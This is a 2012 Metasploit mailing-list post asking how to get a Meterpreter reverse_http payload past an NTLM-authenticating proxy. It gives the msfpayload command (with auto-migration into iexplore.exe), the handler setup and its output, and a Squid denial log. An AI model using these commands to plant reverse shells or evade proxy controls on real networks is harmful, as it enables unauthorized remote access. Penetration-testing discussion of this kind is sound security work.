Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

meterpreter ntlm proxy bypass

From: audio audience <audience099 () gmail com>
Date: Wed, 11 Apr 2012 22:49:57 +0300
Hello Everyone,

I want to bypass ntlm supported proxy bypass with meterpreter.
I tested it in my Labs; all outgoing traffics blocked by firewall for
client. If client want to access internet, it's need to set windows
username and password to ntlm auth. proxy.

I created meterpreter payload this following options;
# msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080
AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe

For listening mode;
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread,
process, none
   LHOST     x.y.z.t    yes       The local listener hostname
   LPORT     8080             yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started HTTP reverse handler on http://x.y.z.t:8080/
[*] Starting the payload handler...


And then i ran 8.exe to victim computer but proxy is blocked meterpreter
http connection, because meterpreter didn't complate ntlm auth.
Squid Log;
1334171617.857      0 a.b.c.d TCP_DENIED/407 1744 GET
http://x.y.z.t:8080/l2eY - NONE/- text/html

How i can bypass ntlm auth. with meterpreter payload.

Thanks for supports

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: